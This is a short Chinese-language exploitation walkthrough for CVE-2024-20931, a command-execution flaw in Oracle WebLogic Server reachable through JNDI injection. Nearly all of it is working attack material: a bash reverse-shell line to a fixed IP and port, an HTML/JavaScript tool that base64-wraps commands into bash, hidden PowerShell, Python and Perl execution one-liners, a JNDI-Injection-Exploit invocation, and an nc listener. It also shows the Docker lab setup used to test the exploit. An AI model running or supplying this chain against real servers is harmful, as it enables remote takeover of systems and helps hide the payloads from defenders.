CVE-2024-20931 | Weblogic Server JNDI命令执行漏洞

#下载镜像docker pull ismaleiva90/weblogic12

#启动环境docker run -dit -p 7001:7001 -p 7002:7002 --restart=always ismaleiva90/weblogic12:latest

java -jar CVE-2024-20931.jar

bash -i >& /dev/tcp/192.168.11.51/5557 0>&1

<!--Java Runtime Bash 编码网页源码--><!DOCTYPE html><html><head>    <title>java runtime exec usage...</title></head><body>    <p>Input type:<input type="radio" id="bash" name="option" value="bash" onclick="processInput();" checked=""><label for="bash">Bash</label><input type="radio" id="powershell" name="option" value="powershell" onclick="processInput();"><label for="powershell">PowerShell</label><input type="radio" id="python" name="option" value="python" onclick="processInput();"><label for="python">Python</label><input type="radio" id="perl" name="option" value="perl" onclick="processInput();"><label for="perl">Perl</label></p>

    <p><textarea rows="10" style="width: 100%; box-sizing: border-box;" id="input" placeholder="Type Bash here..."></textarea><textarea rows="5" style="width: 100%; box-sizing: border-box;" id="output" onclick="this.focus(); this.select();" readonly=""></textarea></p>

<script>  var taInput = document.querySelector('textarea#input');  var taOutput = document.querySelector('textarea#output');

  function processInput() {    var option = document.querySelector('input[name="option"]:checked').value;

    switch (option) {      case 'bash':        taInput.placeholder = 'Type Bash here...'        taOutput.value = 'bash -c {echo,' + btoa(taInput.value) + '}|{base64,-d}|{bash,-i}';        break;      case 'powershell':        taInput.placeholder = 'Type PowerShell here...'        poshInput = ''        for (var i = 0; i < taInput.value.length; i++) { poshInput += taInput.value[i] + unescape("%00"); }        taOutput.value = 'powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc ' + btoa(poshInput);        break;      case 'python':        taInput.placeholder = 'Type Python here...'        taOutput.value = "python -c exec('" + btoa(taInput.value) + "'.decode('base64'))";        break;      case 'perl':        taInput.placeholder = 'Type Perl here...'        taOutput.value = "perl -MMIME::Base64 -e eval(decode_base64('" + btoa(taInput.value) + "'))";        break;      default:        taOutput.value = ''    }

    if (!taInput.value) taOutput.value = '';  }

  taInput.addEventListener('input', processInput, false);</script>

</body></html>

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "编码后的反弹Shell命令" -A "启动恶意服务的服务器IP"

nc -lvnp 5557

https://github.com/dinosn/CVE-2024-20931

https://www.oracle.com/security-alerts/cpujan2024.htmlhttps://github.com/dinosn/CVE-2024-20931